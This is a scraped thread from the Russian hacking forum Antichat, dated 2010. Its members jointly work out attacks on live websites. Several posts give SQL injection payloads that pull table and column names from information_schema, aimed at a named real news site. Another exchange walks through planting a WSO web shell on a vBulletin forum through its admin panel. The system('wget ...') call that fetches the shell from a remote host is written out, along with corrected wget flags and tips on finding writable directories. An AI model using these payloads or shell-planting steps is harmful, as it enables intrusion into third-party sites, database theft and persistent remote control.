Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.04.2010, 00:01
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от DrakonHaSh
возможно фильтр на TABLE_NAME, попробуй перевести TABLE_NAME в hex или char
операторы нельзя переводить в hеx или char
|
|
|
28.04.2010, 00:02
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
ой, сорри, ступил 
Последний раз редактировалось DrakonHaSh; 28.04.2010 в 00:09..
|
|
|
|
28.04.2010, 00:16
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
странно... запрос обрабатывается "нормально" бех вывода ошибок
запрос
ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--
выводит пустую страницу без новостей, и ошибок
Последний раз редактировалось pinch; 28.04.2010 в 00:20..
|
|
|
|
28.04.2010, 00:40
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от pinch
странно... запрос обрабатывается "нормально" бех вывода ошибок
запрос
ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--
выводит пустую страницу без новостей, и ошибок
так попробуй
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)--
иле так..
ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--
Последний раз редактировалось [Feldmarschall]; 28.04.2010 в 00:49..
|
|
|
|
28.04.2010, 08:27
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
хелп) сос))
Вообщем пытаюсь залить шелл через админку вб 4.0.2
Вообщем подробно не буду...
в модуль впихиваю такой код
system("wget -o /home/www/сайт.by/forum/customavatars/inbex2.php http://сайт.narod.ru/wso2.php");
Захожу на страницу forum.site.ru/faq.php
Думает,думает, и потом вылазит 404 not found
Далее иду по адресу
forum.сайт.by/customavatars/inbex2.php
и тупо белая страница
пытаюсь проделать туже функцию только меняю название шелла которое будет на серваке
и иногда показывает например по адресу
forum.сайт.by/customavatars/inbex3.php такую хрень = \ :
Код:
--2010-04-27 20:25:52-- http://сайт.narod.ru/wso2.php Resolving сайтnarod.ru... 213.180.199.44 Connecting to сайт.narod.ru|213.180.199.44|:80...
и больше ничего = \
кто знает в чем проблема?
почему шелл не заливается???  |
|
|
|
28.04.2010, 11:37
|
|
Новичок
Регистрация: 22.01.2009
Сообщений: 11
Провел на форуме:
114084
Репутация:
3
|
|
Сообщение от GroM88
хелп) сос))
Вообщем пытаюсь залить шелл через админку вб 4.0.2
Вообщем подробно не буду...
в модуль впихиваю такой код
system("wget -o /home/www/сайт.by/forum/customavatars/inbex2.php http://сайт.narod.ru/wso2.php");
Захожу на страницу forum.site.ru/faq.php
Думает,думает, и потом вылазит 404 not found
Далее иду по адресу
forum.сайт.by/customavatars/inbex2.php
и тупо белая страница
пытаюсь проделать туже функцию только меняю название шелла которое будет на серваке
и иногда показывает например по адресу
forum.сайт.by/customavatars/inbex3.php такую хрень = \ :
Код:
--2010-04-27 20:25:52-- http://сайт.narod.ru/wso2.php Resolving сайтnarod.ru... 213.180.199.44 Connecting to сайт.narod.ru|213.180.199.44|:80...
и больше ничего = \
кто знает в чем проблема?
почему шелл не заливается???
1. Писать не -o, а -O (зааглавная).
2. Правильно писать так: wget http://shell.com/shell.txt -O shell.php
-O - чтобы залить с другим именем.
-o - вместо шелла заливает по заданному адресу РЕЗУЛЬТАТ ЗАЛИВКИ, т.е. это не то.
А может прав нету? Проверь id; ls -la;
Если и вправду прав нету, то ищи где есть и делай так:
cd /tut/prava/0777/; wget http://xx.narod.ru/shell.txt -O shell.php
или в -O укажи путь новый, т.е. чтобы cd не писать.
|
|
|
|
28.04.2010, 11:54
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
DIEZalok Прочитай plz личку)
|
|
|
|
28.04.2010, 17:51
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
так попробуй +or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)-- иле так.. ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--
неее не катит....
http://www.looplifter.co.uk/news.asp?id=1
|
|
|
|
28.04.2010, 18:02
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от pinch
не выводит таблицы ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--
в чем может быть проблема?
зато выводит колонки
ID=1+OR+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATI ON_SCHEMA.COLUMNS)--
Сообщение от [Feldmarschall]
так попробуй
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)--
иле так..
ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+cast(table_name+ as+int)+from+information_schema.columns)--
Я конечно понимаю что методом тыка, может что-то/когда-то получится, но всё же...Для начала узнайте что находится в базе information_schema и станет намного легче искать решения проблемы.
Последний раз редактировалось v1d0qz; 28.04.2010 в 18:13..
|
|
|
|
28.04.2010, 18:27
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
вот объясните (незнаком я с внутренним миром бд) впервые вижу такое сочетание:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+ information_schema.columns)--
такой запрос что выводит? таблицу, колонку?
вроде вывод ВСЕХ колонок бд имеет вид:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+column_name+from +information_schema.columns)--
вывод ВСЕХ таблиц бд имеет вид:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+ information_schema.tables)--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
Похожие темы
Линейный вид
